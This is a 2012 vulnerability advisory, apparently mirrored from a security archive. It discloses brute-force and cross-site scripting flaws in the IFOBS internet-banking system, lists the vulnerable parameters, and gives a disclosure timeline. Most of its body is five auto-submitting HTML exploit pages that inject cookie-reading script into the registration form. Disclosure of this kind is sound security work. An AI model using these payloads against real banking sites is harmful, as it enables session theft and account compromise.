Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:28579
HistoryOct 01, 2012 - 12:00 a.m.

BF and XSS vulnerabilities in IFOBS

2012-10-0100:00:00
vulners.com
17

Hello 3APA3A!

I want to warn you about Brute Force and Cross-Site Scripting vulnerabilities in system IFOBS.

IFOBS - it's Internet-banking system, which is widespread and particularly it's used by large number of Ukrainian banks.

These are the next 36 vulnerabilities in IFOBS: 2 BF and 34 XSS (in the first advisory there were 38 vulnerabilities).


Affected products:

Vulnerable are all versions of IFOBS. The developers have ignored and not fixed these vulnerabilities (all holes from three advisories).


Details:

Brute Force (WASC-11):

In login form of certificates console (http://site/ifobsClient/certmasterlogin.jsp) there is no protection against picking up password (captcha).

In forms of checking registration status and editing of registration profile there are no protection against picking up password (captcha). Both forms are at page http://site/ifobsClient/regclientmain.jsp (they also can be accessed by addresses http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForStatus and http://site/ifobsClient/regclientmain.jsp?myaction=getloginformForEdit) and they use the same script.

Cross-Site Scripting (WASC-08):

POST request at page http://site/ifobsClient/regclientmain.jsp in parameters: furtherAction, secondName, firstName, thirdName, BirthDay, BirthMonth, BirthYear, address, livePlace, passportSerial, passportNumber, PassportDay, PassportMonth, PassportYear, passportIssueAgency, tempDocSerial, tempDocNumber, DocDay, DocMonth, DocYear, idCodeNumber, CodeRegDay, CodeRegMonth, CodeRegYear, idCodeRegPlace, phone, email, pmcountry, pmnumber, keyword, password, bankAddress, bankContacts, typeclient.

Exploits for the first five vulnerabilities (in parameters furtherAction, secondName, firstName, thirdName, BirthDay):

IFOBS XSS-6.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp&quot; method="post">
<input type="hidden" name="login" value="111111">
<input type="hidden" name="id" value="1111">
<input type="hidden" name="myaction" value="login">
<input type="hidden" name="furtherAction" value='"><script>alert(document.cookie)</script>'>
</form>
</body>
</html>

IFOBS XSS-7.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp&quot; method="post">
<input type="hidden" name="secondName" value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-8.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp&quot; method="post">
<input type="hidden" name="firstName" value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-9.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp&quot; method="post">
<input type="hidden" name="thirdName" value='"><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthDay" value="01">
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>

IFOBS XSS-10.html

<html>
<head>
<title>IFOBS XSS exploit (C) 2012 MustLive. http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/ifobsClient/regclientmain.jsp&quot; method="post">
<input type="hidden" name="BirthDay" value='</script><script>alert(document.cookie)</script>'>
<input type="hidden" name="BirthMonth" value="01">
<input type="hidden" name="BirthYear" value="2012">
<input type="hidden" name="myaction" value="submitform">
<input type="hidden" name="typeclient" value="standart">
</form>
</body>
</html>


Timeline:

2012.05.04 - found vulnerabilities during pentest. After I've informed my client, he could inform the developers.
2012.05.29 - announced at my site.
2012.06.01 - informed the developers about vulnerabilities (the first advisory).
2012.06.01 - informed the developers about vulnerabilities (the second advisory).
2012.06.02 - informed the developers about vulnerabilities (the third advisory).
2012.09.18 - disclosed at my site (http://websecurity.com.ua/5859/&#41;.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua